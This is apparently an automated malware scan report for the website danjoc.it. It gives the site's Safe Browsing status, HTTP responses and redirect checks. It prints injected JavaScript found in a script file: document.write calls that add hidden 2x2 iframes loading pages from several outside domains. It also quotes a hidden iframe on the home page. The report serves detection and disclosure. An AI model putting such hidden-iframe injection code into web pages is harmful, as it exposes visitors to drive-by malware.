Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=danjoc.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://danjoc.it/ | 200 OK Content-Length: 2034 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://painting-games.org/zahi.html?i=1118878 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://painting-games.org/zahi.html?i=1118878> | ||
http://danjoc.it/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 4155 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://venomprotein.com/mzzs.html?j=1118878></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://benwwh.com/zmcs.html?j=1118878></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://blog.fantasygifts.com/ozai.html?j } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://babylonproduction.com/wmci.html?i=1118878></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://babylonproduction.com/wmci.html?i=1118878 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://babylonproduction.com/wmci.html?i=1118878> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzws.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html> Hidden iFrame found. size: 2x2 src: http://blog.fantasygifts.com/ozai.html?j=1118878 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://blog.fantasygifts.com/ozai.html?j=1118878> Hidden iFrame found. size: 2x2 src: http://venomprotein.com/mzzs.html?j=1118878 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://venomprotein.com/mzzs.html?j=1118878> Hidden iFrame found. size: 2x2 src: http://benwwh.com/zmcs.html?j=1118878 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://benwwh.com/zmcs.html?j=1118878> | ||
http://villahome.eu/i.php | 500 Can't connect to villahome.eu:80 (Bad hostname) Content-Length: 156 Content-Type: text/plain | clean |
http://villahome.eu/test404page.js | 500 Can't connect to villahome.eu:80 (Bad hostname) Content-Length: 156 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: danjoc.it
Result:
HTTP/1.1 200 OK
Date: Wed, 23 Apr 2014 17:08:21 GMT
Accept-Ranges: bytes
ETag: "22f755fb9c19ce1:0"
Server: Microsoft-IIS/8.5
Content-Length: 2034
Content-Type: text/html
Last-Modified: Tue, 05 Mar 2013 12:28:46 GMT
Set-Cookie: dadaproaffinity=4ba059caf398721a135b92f9f996b770f613f8caa36a6d05658c6ccba842bcab;Path=/;Domain=danjoc.it
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
...2034 bytes of data.
GET / HTTP/1.1
Host: danjoc.it
Result:
HTTP/1.1 200 OK
Date: Wed, 23 Apr 2014 17:08:21 GMT
Accept-Ranges: bytes
ETag: "22f755fb9c19ce1:0"
Server: Microsoft-IIS/8.5
Content-Length: 2034
Content-Type: text/html
Last-Modified: Tue, 05 Mar 2013 12:28:46 GMT
Set-Cookie: dadaproaffinity=4ba059caf398721a135b92f9f996b770f613f8caa36a6d05658c6ccba842bcab;Path=/;Domain=danjoc.it
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
...2034 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: danjoc.it
Referer: http://www.google.com/search?q=danjoc.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: danjoc.it
Referer: http://www.google.com/search?q=danjoc.it
Result:
The result is similar to the first query. There are no suspicious redirects found.